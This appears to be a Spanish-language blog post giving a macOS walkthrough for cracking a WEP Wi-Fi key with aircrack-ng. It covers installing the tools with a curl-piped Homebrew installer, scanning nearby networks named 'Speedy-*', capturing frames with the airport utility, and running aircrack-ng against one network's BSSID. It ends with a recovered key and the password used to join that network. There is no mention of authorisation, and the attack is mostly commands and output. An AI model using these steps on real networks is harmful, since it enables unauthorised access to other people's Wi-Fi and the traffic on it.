$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Instalar el Xcode del Apple Store:
Instalamos Aircrack-ng con el gestor brew:
$ brew install aircrack-ng
Ver canales para sniffear:
root# /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
Speedy-4325C1 34:4b:50:42:55:c1 -85 1 N -- WEP
Speedy-B11FE4 f2:31:98:b1:0f:ed -79 1 N -- WEP
Speedy-AB1J4C c3:d6:fa:71:3e:68 -82 11 N -- WEP
El en0 es la interface wifi y el 11 es el canal del comando previo. Este comando generará un .cap en el /tmp que utilizaremos posteriormente. Tenemos que dejar que corra un largo rato.
root# /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 11
Capturing 802.11 frames on en0.
Ejecutamos por ultimo el aircrack con la mac del SSID a crackear y la ruta al .cap generado por el comando anterior:
root# aircrack-ng -1 -a 1 -b c3:d6:fa:71:3e:68 /tmp/airportSniffmNzwZc.cap
Finalmente aparecerá algo similar a lo siguiente como resultado si logró romper la wifi:
KEY FOUND! [ 32:30:65:61:63 ] (ASCII: 20eac )
Decrypted correctly: 100%
Para conectarnos a la wifi tendremos que conectarnos a la red seleccionada:
SSID: Speedy-AB1J4C
Password: 3230656163
Para conectarnos a la wifi tendremos que conectarnos a la red seleccionada:
SSID: Speedy-AB1J4C
Password: 3230656163
No hay comentarios:
Publicar un comentario